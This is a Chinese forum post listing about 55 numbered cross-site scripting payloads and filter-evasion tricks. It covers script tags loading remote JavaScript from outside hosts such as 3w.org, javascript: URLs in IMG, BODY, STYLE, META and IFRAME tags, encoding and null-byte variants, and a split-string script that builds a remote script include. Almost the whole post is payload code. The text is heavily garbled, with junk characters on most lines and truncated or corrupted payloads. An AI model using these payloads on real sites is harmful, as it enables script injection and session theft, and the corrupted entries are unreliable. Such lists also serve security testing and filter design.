(1)普通的XSS JavaScript注入" j4 i/ n1 U: k' f; t( N0 P" @/ y! A
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT> ~) A; O2 }+ `' D& `) }$ W3 z. v4 [. j' l
(99)另类弹框- B$ A1 n' E; j
<q/oncut=alert()>1
# D1 d3 D& T; {, W/ l. A1 ~4 V" M' }<s/onclick=alert()>b3 j/ M6 @. z- r: P( G
<XSS=" onclick="alert(1)//">clickme</SSX=">
( O" J8 F$ U. e+ e, s: s <zzz onclick=alert`1`>clickme</zzz>
" _! i) Y$ C' E1 U) C& y <a onclick=alert`1`>clickme</a>9 b, Z) ]- C9 x- ]
<a=">clickme</a=">
* m0 h# [* d* n) b( b<a=">clickme</a>- {8 S3 n% j/ F I" n$ L
<z=">clickme</z=">
3 N. S1 U- \$ B3 o/ P) b7 \% I! J<z onclick=alert`1`>clickme</z>" _; \8 o2 e# u4 i
/ a t) n6 D4 T# l
(2)IMG标签XSS使用JavaScript命令
6 ?7 j" c9 N) J) y% b2 l1 _2 w* r<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>5 V- k( \% Q* ~! {
9 e& C5 i* E v; P
(3)IMG标签无分号无引号% O/ e. U: |% p" a
<IMG SRC=javascript:alert(‘XSS’)>! W( t( [+ e8 e: `3 C
' j/ I W: ]; T2 H. \! x! W7 n- Y) ~
(4)IMG标签大小写不敏感
C- {2 e* @- V" Q' d# ~- I$ z<IMG SRC=JaVaScRiPt:alert(‘XSS’)>, J( S; H$ B- h4 U8 r+ s
: K- B3 p. T6 W. p$ a- o( V(5)HTML编码(必须有分号)) G5 S3 X. i; S: e4 C$ }7 T
<IMG SRC=javascript:alert(“XSS”)>9 |0 |, e9 z# v! v5 k: { h
2 i5 d( v1 E7 `) ]# `(6)修正缺陷IMG标签
- E' Q$ I, [ x- t/ \% A; s<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>: s/ r" W# `8 z6 s9 x+ A
# i& R1 u; i' Y. J3 n: a0 w(7)formCharCode标签(计算器)8 I! Q' g$ c Q' G# U
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>, y- `: F& M9 a" M; B+ R8 i4 Z' @
, M8 G! L2 k8 ]1 D' _( [0 G* `(8)UTF-8的Unicode编码(计算器)* x0 `# g, ]( S4 b( S$ O
<IMG SRC=jav..省略..S')>! S$ ~, d! L$ F. |1 I: [
, ~* l- v% t, e+ J- d3 @/ [2 ?. U8 z(9)7位的UTF-8的Unicode编码是没有分号的(计算器), S2 C$ I& Y3 W
<IMG SRC=jav..省略..S')>& z- b, E# k# ]* s# R8 g
7 x0 t' y; D* e: ]3 a8 X) C(10)十六进制编码也是没有分号(计算器), l }0 V. L, y0 Z* H' w3 h2 U/ m
<IMG SRC=\'#\'" /span>- V5 c7 d2 W, N8 x% t
& h) Y0 L# X- W
(11)嵌入式标签,将Javascript分开, X8 U* f* \7 Y( c* q
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
/ F# d( h2 E5 ^* c8 y7 S
5 _ F. F! H) ~- ?' e$ t) d(12)嵌入式编码标签,将Javascript分开4 N! q$ P/ k e( c0 H
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
" U" Q ^7 @6 ?4 K
* i" r( o$ x! h) x* x8 f(13)嵌入式换行符, `2 N. [: S) r( r, p5 U9 K
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
: ~9 e6 _6 u" M, a, Q3 C, o; I% @# l5 g
(14)嵌入式回车- Z, `3 Z, h' T1 p. }. s3 [
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>% J9 Z/ ]+ t9 y! ^5 y
4 d. f/ Y: U I' v) i(15)嵌入式多行注入JavaScript,这是XSS极端的例子
2 p4 A6 h( S8 i3 M/ F( G, h5 G<IMG SRC=\'#\'" /span>
) ]8 X, H3 E, {- `1 \; w3 _8 u- B) T/ g4 z5 l
(16)解决限制字符(要求同页面)
8 z5 c$ j# q: m, M$ H% Z5 ^<script>z=’document.’</script>3 T& s0 q8 K" G2 e# p
<script>z=z+’write(“‘</script>3 [4 B' V! k2 `8 J3 I5 u
<script>z=z+’<script’</script>
+ W! i0 U8 @) ^8 {) K, C5 t<script>z=z+’ src=ht’</script>+ @( }- q9 [5 v9 r
<script>z=z+’tp://ww’</script>3 B) y3 _" E* r6 N9 X' C5 L' J2 U$ x
<script>z=z+’w.shell’</script>+ s* [8 j$ z5 v/ I% v" j u, I1 @/ R7 r
<script>z=z+’.net/1.’</script>
% }3 B3 a. B2 b7 N) r9 m3 a<script>z=z+’js></sc’</script>
7 m- R% `( D# x1 S3 [<script>z=z+’ript>”)’</script>
& v# S; g# x1 [: a<script>eval_r(z)</script>
/ w, |1 x" A- e6 x; x9 s( R
" e$ ]& R. \' o: y: J; H$ U/ m(17)空字符
5 R5 l6 [3 w, F( | P( V/ B2 `perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out0 u) v, ]( @7 s: a& ]% P
3 d7 ^# W s* t, |9 t2 C; y
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
$ e2 Q/ x# L" k- V; [/ b! D! Jperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out% r2 b$ p4 M& V4 @
! w2 C' T9 U7 z( F+ H* I
(19)Spaces和meta前的IMG标签
$ j" H4 D6 h$ w- C9 Z<IMG SRC=\'#\'" � javascript:alert(‘XSS’);”>1 E; m1 b& s1 `5 Q
! O8 O( e4 ?/ f0 a/ [# g, M0 @# S
(20)Non-alpha-non-digit XSS
% g3 k; c' _) n6 `, j<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
2 s; p9 T: k% u: u2 o& ]: j; C2 I$ G( ?
(21)Non-alpha-non-digit XSS to 28 Y' Z8 M v( e
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
( y9 ~5 i1 a! ]! E4 D2 o* g% y6 Y3 `, p
(22)Non-alpha-non-digit XSS to 3
6 x: {4 I: R: [<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
8 w: x7 n0 j+ }& e8 g' I2 o+ w/ W; S% z% ^& R
(23)双开括号8 @& n( O) w) ^1 m2 L0 j
<<SCRIPT>alert(“XSS”);//<</SCRIPT>0 u7 [( H, U3 L5 o5 p# d4 g
1 B/ h; w$ `2 ^1 k8 O9 F8 K3 f I: Q(24)无结束脚本标记(仅火狐等浏览器)
7 n) ?6 T3 T' x2 y2 [<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>$ v$ a, C; ~ L/ n/ b y
5 E1 y' \' {4 ^! o& v(25)无结束脚本标记2) S7 K# A% y! L
<SCRIPT SRC=//3w.org/XSS/xss.js>9 k8 O: g4 N( k* X
T4 G4 C7 R/ M! E3 w(26)半开的HTML/JavaScript XSS
! u! c* V; K2 ?% Z$ ]% s" n7 C! b3 V3 c<IMG SRC=\'#\'" /span>
J! W! c0 |% T) D/ l* @: Q4 |9 N6 t* J9 L5 B. N# m. ?. l, Z
(27)双开角括号7 P' ` G2 G9 a8 o5 m3 t% A2 T
<iframe src=http://3w.org/XSS.html <
6 j: q) x, {& I7 n
" B: G7 j0 O1 v8 C" S' d(28)无单引号 双引号 分号
N1 j7 g2 I* D' j<SCRIPT>a=/XSS/8 j& D. a7 a8 Q* U! J8 ]
alert(a.source)</SCRIPT>
3 ^! q1 T7 @7 |5 B: h2 ?/ M" f9 C* M8 g8 q+ o4 [6 I |( w
(29)换码过滤的JavaScript
- E, R2 g5 A1 w/ r1 ]\”;alert(‘XSS’);//
4 J) T8 J* F4 w$ B* Z+ _3 z9 e; q4 I$ C
(30)结束Title标签3 }. w Y; T F2 Z
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
- p5 d# y0 h: [7 i9 X9 g$ Y- O8 [# K! z; B
(31)Input Image
! L" l/ ~9 k+ P3 [* P! {<INPUT SRC=\'#\'" /span>
; c9 f2 G# a5 A7 z9 {
( \ ?; b, G G(32)BODY Image
/ M8 ]9 s/ c: P5 w& n* i<BODY BACKGROUND=”javascript:alert(‘XSS’)”>. q4 Z+ s0 b/ [# L' i: p, ?0 I
/ N/ g) ^3 {! f7 M1 q7 O
(33)BODY标签
* O! R7 ]; F3 L4 Q<BODY(‘XSS’)>
( R; I6 p% @6 c; j) G5 N3 q' U7 m; D. h$ B/ u G7 [- \& v$ \
(34)IMG Dynsrc
$ E: t4 t. R9 J- `) S<IMG DYNSRC=\'#\'" /span>" M: G0 H4 y! [. C, S
: l# G7 h7 r" A. \& K4 y+ G! r9 }
(35)IMG Lowsrc2 R& g7 t4 X7 i: R* `+ x
<IMG LOWSRC=\'#\'" /span>
( u j8 |- \+ |* ^5 J. v' _- y: [- }
(36)BGSOUND
+ m W) q, \' a( e<BGSOUND SRC=\'#\'" /span>; j) B4 |% X4 h' H2 ~2 P9 D
" q6 Q; w6 h9 x* k4 B
(37)STYLE sheet
4 V7 a+ N( k5 c4 Z+ C: B<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>. R+ p, l5 ? J+ a# Y8 X. f5 \1 a
( T" {# ~6 s$ |$ ]
(38)远程样式表$ y/ e6 v/ p0 a/ \- u9 Y+ i
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>! d/ {8 y/ `: R, i. d
5 D, u( g0 ~( o* l
(39)List-style-image(列表式)
& N9 N* F% i, c8 z8 O; a4 a9 B- a<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
2 c! M0 b! N' | R% m ^6 x- }+ M
(40)IMG VBscript
^; g. N3 \. W" l<IMG SRC=\'#\'" /STYLE><UL><LI>XSS
N' q+ O* b k, w4 J& ^: s% ?2 K% t
6 C" v4 d' Y! |, H' j(41)META链接url) I* I0 ]4 U/ m8 p3 o9 _* g
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>: v; T6 B' X$ `: @2 a6 y; a
. }( R% b3 c7 P0 U
(42)Iframe
" v: A$ r% ?) ^/ \( b5 H<IFRAME SRC=\'#\'" /IFRAME>" d6 |$ k, w: r; \
: Q2 B h( E# a! e2 V- ~ J# x* C(43)Frame
/ ^& s" q; `5 K d3 J' ?/ P' g7 Z; W<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>6 f; L0 i$ [* w, V
B2 c8 r. w5 |4 z0 W: Z8 l
(44)Table9 h8 Z6 I, J) P, d0 G) Q
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>* C q/ E/ O" J k0 I0 ?
I3 l0 x/ C2 p
(45)TD
7 B( M; J; ^. ~2 W<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
. H5 V2 O% F! s' {! j0 E) h6 T% b1 k0 t8 |# R
(46)DIV background-image
: K- @9 O9 G' k<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
7 L, {6 x2 c: |* }
' o! D1 Q3 y+ h) J(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
( }2 f' }# Q7 z* f/ v<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>
' ~" W8 ]7 X# u1 X$ X( I
5 I% @- W4 _0 K+ U3 P+ u(48)DIV expression% u8 H1 f6 [( S* S0 c9 [* A8 x8 O
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>" ?( P. q" q# ^% l9 M% i
5 L% P8 q: v: e; l0 q(49)STYLE属性分拆表达' |6 E: i: g7 h$ ?% W+ B' h
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>+ I# h/ ?, e. P% b6 T# s- p1 \
# M/ {! h0 q( `, W" C(50)匿名STYLE(组成:开角号和一个字母开头)
3 ]0 L+ k3 p, u( T, }( R<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
2 n: l; j. h7 s% v; B/ x1 U* O' T* k
/ t# N/ [& d6 n& d j" ?$ {; Q! n(51)STYLE background-image4 {: C2 p- X9 i# O7 y; [; d, [
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
* L9 P( [6 d: X. e* }- p% }9 m7 \- b- v; G
(52)IMG STYLE方式3 h, w% j; n; m: V$ i7 T/ a* b" C8 i
exppression(alert(“XSS”))’>5 u) w% X) o% k7 |7 q! O- }, z
2 u) Z) |5 B% C(53)STYLE background" V9 k+ ^: _, x9 Y/ i% F$ j
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>$ V8 x% r, U0 Z. ^# y( W
. A2 A5 G" |, {3 k(54)BASE6 y4 T. M3 S* G5 H3 f
<BASE HREF=”javascript:alert(‘XSS’);//”>3 R: N+ @- y" @( r* K: y
' q8 z: j5 P' \& j t
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS$ k3 T8 q: D0 |
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>
' }# L2 Y3 G, A5 g1 r |
发表于 2016-4-28 10:06:15
收藏
支持
反对